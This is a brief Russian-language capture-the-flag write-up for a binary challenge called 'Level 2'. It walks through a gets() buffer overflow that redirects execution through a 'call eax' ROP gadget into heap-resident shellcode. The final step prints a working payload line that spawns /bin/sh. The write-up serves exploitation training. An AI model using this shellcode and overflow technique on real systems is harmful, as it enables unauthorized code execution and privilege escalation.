# Level 2 - вызов шеллкода

### 1. Открываем бинарь в иде и реверсим его
    - В функции p() используется уязвимая функция gets
    - Возвращаемое значение - strdup() от введенной строки
    Мы можем попробовать записать шеллкод в строку и исполнить его в куче
    Для этого нужен подходящий роп-гаджет, который бы вызывал код в eax

### 2. ropper -f ./level2 и подбираем нужный гаджет, например
    0x080484cf: call eax;

### 3. Далее переполняем буфер шеллкодом и адресом гаджета, перезаписывая адрес возврата

### 4. Формируем пейлоад и шлем его в stdin ./level2, не забывая вызвать cat, чтобы не потерять возможность ввода в полученный шелл
    (echo -e 'jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xcf\x84\x04\x08'; cat) | ./level2

